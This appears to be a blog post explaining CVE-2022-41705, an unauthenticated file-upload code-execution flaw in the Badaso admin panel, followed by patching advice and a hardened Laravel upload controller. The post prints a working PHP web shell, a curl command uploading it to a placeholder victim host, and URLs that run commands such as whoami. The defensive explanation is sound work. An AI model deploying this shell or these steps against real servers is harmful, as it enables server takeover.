If you use Badaso—the Laravel-based admin panel—especially version 2.6.3 or earlier, you need to know about CVE-2022-41705. This critical vulnerability lets a remote attacker—without logging in—run any code they want on your server. In this post, I’ll walk you through how this works, what the exploit might look like, and how you can fix it.
What Is CVE-2022-41705?
Badaso lets users (admin or otherwise) upload files to your server with little to no validation. That means an attacker can upload files like PHP scripts, which the server may then accidentally execute.
In simple terms:
*Someone can upload a hidden backdoor or script, then visit it and control part of your server.*
1. Upload a Malicious File:
Instead of uploading a harmless image, they upload a file like shell.php—a tiny script that gives full control.
2. Access/Execute the Uploaded File:
By browsing to the uploaded file (like mysite.com/uploads/shell.php), the attacker can send commands to your server.
Example Code Snippet: Malicious Upload
Here’s an example of a classic PHP web shell an attacker might upload (never use this on a real site):

```php
<?php
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
}
?>
```

This tiny script will run whatever command gets passed via the cmd parameter (like ls, cat /etc/passwd, etc.).
Exploit Example: How an Attacker Does It
Let’s say the upload endpoint is /api/upload.
Step 1: Upload the file using curl

```bash
curl -F "file=@shell.php" https://victim.com/api/upload
```

Step 2: Locate the uploaded file
If the upload folder is /uploads, the attacker tries

```
https://victim.com/uploads/shell.php
```

Step 3: Run a server command via the shell

```
https://victim.com/uploads/shell.php?cmd=whoami
```

This will display the user account running the server.
Official Sources & References
- CVE-2022-41705 on NIST
- Badaso’s GitHub
- Original advisory
How Can You Fix This?
1. Update Badaso
Patch immediately! Developers released new versions fixing this issue.
2. Block PHP Uploads
Only allow safe file types (like .jpg, .png). Block all scripts.
Example code in Laravel for stricter validation:

```php
$request->validate([
    'file' => 'required|mimes:jpg,jpeg,png,pdf|max:2048'
]);
```
3. Store Uploads Outside Web Root
Move uploads to a directory outside the web root, so the web server never serves or executes them directly.
4. Authenticate Uploads
Require users to log in before uploading files.
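Putting fixes 2 through 4 together, here is an added example of a hardened Laravel upload controller; it is not Badaso's own code. It assumes a hypothetical route `POST /api/upload` registered with the `auth` middleware and a hypothetical filesystem disk named `uploads` whose root sits outside public/.

```php
<?php
// Added example, not Badaso's code. Assumes a route registered as
//   Route::post('/api/upload', [UploadController::class, 'store'])->middleware('auth');
// (fix 4) and a disk in config/filesystems.php (fix 3) such as
//   'uploads' => ['driver' => 'local', 'root' => storage_path('app/uploads')],
// whose root is outside public/, so nothing stored there is ever served or executed.

namespace App\Http\Controllers;

use Illuminate\Http\JsonResponse;
use Illuminate\Http\Request;
use Illuminate\Support\Str;

class UploadController
{
    // Server-side allow-list: content-sniffed MIME type -> extension written to disk.
    private const ALLOWED = [
        'image/jpeg'      => 'jpg',
        'image/png'       => 'png',
        'application/pdf' => 'pdf',
    ];

    public function store(Request $request): JsonResponse
    {
        // Fix 2: validate on the sniffed MIME type and size (max is in KB),
        // not on the extension or Content-Type header the client chose.
        $request->validate([
            'file' => 'required|file|mimetypes:image/jpeg,image/png,application/pdf|max:2048',
        ]);

        $file = $request->file('file');

        // Derive the extension from the sniffed type, never from the original name,
        // so an upload named shell.php can only ever land on disk as .jpg/.png/.pdf.
        $ext = self::ALLOWED[$file->getMimeType()] ?? null;
        if ($ext === null) {
            abort(422, 'Unsupported file type');
        }

        // Random server-chosen name: the uploader cannot predict or control the path.
        $name = Str::random(40) . '.' . $ext;

        // Fix 3: write to the non-public disk and return an opaque handle, not a URL.
        $path = $file->storeAs('', $name, 'uploads');

        return response()->json(['id' => $path]);
    }
}
```

Because the file is stored under a random name with a server-chosen extension on a disk the web server does not expose, a stored file can only reach a browser through an application route that reads it back and sets the Content-Type itself.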
Summary
CVE-2022-41705 is dangerous because it doesn’t require a password or any access. Anyone can upload PHP code and hijack your server. Upgrade Badaso, validate uploads, and check your site right away.
Timeline
Published on: 11/25/2022 18:15:00 UTC
Last modified on: 11/30/2022 16:08:00 UTC